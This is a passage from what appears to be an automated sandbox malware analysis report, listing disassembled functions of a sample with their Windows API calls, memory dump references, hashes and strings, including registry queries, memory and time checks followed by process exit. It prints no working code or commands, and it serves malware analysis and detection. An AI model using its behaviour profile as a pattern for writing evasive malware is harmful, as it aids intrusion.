                            • std::_Xinvalid_argument.LIBCPMT ref: 00447D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$std::exception::exception
                            • String ID: invalid string position$string too long
                            • API String ID: 3310641104-4289949731
                            • Opcode ID: db7a791ea6cd7f3e9641fd9be2bf14fc6c8cedd7f9feb08dfc60de607633f0e7
                            • Instruction ID: 8be06c4f16577e81d31aa894e2f61ebe5677556fb9290f29797723cd3d764fb2
                            • Opcode Fuzzy Hash: db7a791ea6cd7f3e9641fd9be2bf14fc6c8cedd7f9feb08dfc60de607633f0e7
                            • Instruction Fuzzy Hash: 9721E4727146004BE720DE6CD880A3AB7E5EFA2751F204A2FE4428B341D774DC0687A9
                            Function 004533C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004533EF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 004533F6
                            • GlobalMemoryStatusEx.KERNEL32 ref: 00453411
                            • wsprintfA.USER32 ref: 00453437
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB
                            • API String ID: 2922868504-2651807785
                            • Opcode ID: fa34b17db002dedfacdcb907588a08eed71456ce414b40cc1506c205be027f5b
                            • Instruction ID: 3e494677d988449b4b49dee46e1b27c840a2bfe5bfd512270a6d636a7fec22a9
                            • Opcode Fuzzy Hash: fa34b17db002dedfacdcb907588a08eed71456ce414b40cc1506c205be027f5b
                            • Instruction Fuzzy Hash: A001D8B1A04214AFDB14DFA8DD45B6EB7BDFB45711F10022AFD06E7380D7B85D0486A5
                            Function 00452400 Relevance: 7.7, APIs: 6, Instructions: 234stringCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlenmemset
                            • String ID:
                            • API String ID: 3212139465-0
                            • Opcode ID: 37bbeb9c2373bfbe659c2d782dd8df14e1821b5b2bc2257fbb9176aab56a4f7e
                            • Instruction ID: 96785b680e4dedbe994e6312e7edf762cbbec5c0efac935857beac322a2bf9e1
                            • Opcode Fuzzy Hash: 37bbeb9c2373bfbe659c2d782dd8df14e1821b5b2bc2257fbb9176aab56a4f7e
                            • Instruction Fuzzy Hash: 4881F671E003099BDB10CF94DD40BAEB7B5AF86305F14806FE904A7382E7B99D49CB98
                            Function 00447EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00447F31
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00447F60
                            • StrCmpCA.SHLWAPI(00000000,00464C3C), ref: 00447FA5
                            • StrCmpCA.SHLWAPI(00000000,00464C3C), ref: 00447FD3
                            • StrCmpCA.SHLWAPI(00000000,00464C3C), ref: 00448007
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: d804c56d81fa31a0d6502287c6dd385c94ed8cf2802f2181d9112cf6fa729961
                            • Instruction ID: 6c31e44c8d1ffeb2b438a65c838659fa60835f1fa036895fd662faae341cb334
                            • Opcode Fuzzy Hash: d804c56d81fa31a0d6502287c6dd385c94ed8cf2802f2181d9112cf6fa729961
                            • Instruction Fuzzy Hash: B441A23060411ADFDB20DF68D480E9EB7B4FF58300F11419AE805D7351EB78AA67CBA6
                            Function 00448050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 004480BB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004480EA
                            • StrCmpCA.SHLWAPI(00000000,00464C3C), ref: 00448102
                            • lstrlen.KERNEL32(00000000), ref: 00448140
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044816F
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 8a901a81d14678a0235852a61db3c9bc7fa7cb26eb3014155245201d70c8202a
                            • Instruction ID: f4c118f3707c4a44c2d9779dddcd854377a02898ea21f90275118b8ff696d9f0
                            • Opcode Fuzzy Hash: 8a901a81d14678a0235852a61db3c9bc7fa7cb26eb3014155245201d70c8202a
                            • Instruction Fuzzy Hash: 2C419C71600206ABEB21EF78D944BAFBBF4EF44300F11841EA946D7204EF78D946CB94
                            Function 00451B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00451B72
                              • Part of subcall function 00451820: lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0045184F
                              • Part of subcall function 00451820: lstrlen.KERNEL32(00FE6D00), ref: 00451860
                              • Part of subcall function 00451820: lstrcpy.KERNEL32(00000000,00000000), ref: 00451887
                              • Part of subcall function 00451820: lstrcat.KERNEL32(00000000,00000000), ref: 00451892
                              • Part of subcall function 00451820: lstrcpy.KERNEL32(00000000,00000000), ref: 004518C1
                              • Part of subcall function 00451820: lstrlen.KERNEL32(00464FA0), ref: 004518D3
                              • Part of subcall function 00451820: lstrcpy.KERNEL32(00000000,00000000), ref: 004518F4
                              • Part of subcall function 00451820: lstrcat.KERNEL32(00000000,00464FA0), ref: 00451900
                              • Part of subcall function 00451820: lstrcpy.KERNEL32(00000000,00000000), ref: 0045192F
                            • sscanf.NTDLL ref: 00451B9A
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00451BB6
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00451BC6
                            • ExitProcess.KERNEL32 ref: 00451BE3
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                            • String ID:
                            • API String ID: 3040284667-0
                            • Opcode ID: 8468909866a91b820bf2e5189f9f982fc6987bb22e1e7adab5879c26596e0674
                            • Instruction ID: fab564feff4e25f15f9dc03c1c48a4ca9f3dc58daf690b8337233a564a3016a4
                            • Opcode Fuzzy Hash: 8468909866a91b820bf2e5189f9f982fc6987bb22e1e7adab5879c26596e0674
                            • Instruction Fuzzy Hash: 9921E4B1518301AF8750EF65D88495FBBF9EFD8314F409A1EF999C3220E774E5088BA6
                            Function 00453130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00453166
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0045316D
                            • RegOpenKeyExA.ADVAPI32(80000002,00FEBAE0,00000000,00020119,?), ref: 0045318C
                            • RegQueryValueExA.ADVAPI32(?,00FFE130,00000000,00000000,00000000,000000FF), ref: 004531A7
                            • RegCloseKey.ADVAPI32(?), ref: 004531B1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: becb4f27c76814e02737689d6aecc2ed18de2eb30ee6a643b159f35e2499d554
                            • Instruction ID: a179ce72085c39685ca53d4c48a9729b3015ab268faeaca76fc994d498418139
                            • Opcode Fuzzy Hash: becb4f27c76814e02737689d6aecc2ed18de2eb30ee6a643b159f35e2499d554
                            • Instruction Fuzzy Hash: 51114276A40205AFD710CF94DD45FABBBBDE784711F10421AFE05D3780DBB559048BA1
                            Function 00438980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00438996
                              • Part of subcall function 0045A1C0: std::exception::exception.LIBCMT ref: 0045A1D5
                              • Part of subcall function 0045A1C0: std::exception::exception.LIBCMT ref: 0045A1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 004389CD
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A188
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: invalid string position$string too long
                            • API String ID: 2002836212-4289949731
                            • Opcode ID: 7e01cf0bcc2c4ef6a285c61639abe4486b8432ec3925e0536b977cdf44cf0bb6
                            • Instruction ID: 238c5f3e2e0c5d03ce533cab4a8fa327ea832dfee80384e7f1da0074fae724b6
                            • Opcode Fuzzy Hash: 7e01cf0bcc2c4ef6a285c61639abe4486b8432ec3925e0536b977cdf44cf0bb6
                            • Instruction Fuzzy Hash: 5C21D6723007504BC7209A6CE840B6AF7999FA5761F20193FF151CB281CB79D841C3AE
                            Function 00438850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00438883
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A188
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: 88cae1d8b3771c5f810bc4e8352331c6b063dcdff9631a1a00ae5e2dc3aa52f8
                            • Instruction ID: 75c536193e2baf0be8b90b08000bb08a208da0b329c2c77036fca46034d5ec6b
                            • Opcode Fuzzy Hash: 88cae1d8b3771c5f810bc4e8352331c6b063dcdff9631a1a00ae5e2dc3aa52f8
                            • Instruction Fuzzy Hash: 8F31E9B5E005159FCB08DF58C8916AEBBB2EB88310F14822EE905DF344DB34AD01CBD5
                            Function 00455910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00455922
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A188
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A1AE
                            • std::_Xinvalid_argument.LIBCPMT ref: 00455935
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_std::exception::exception
                            • String ID: Sec-WebSocket-Version: 13$string too long
                            • API String ID: 1928653953-3304177573
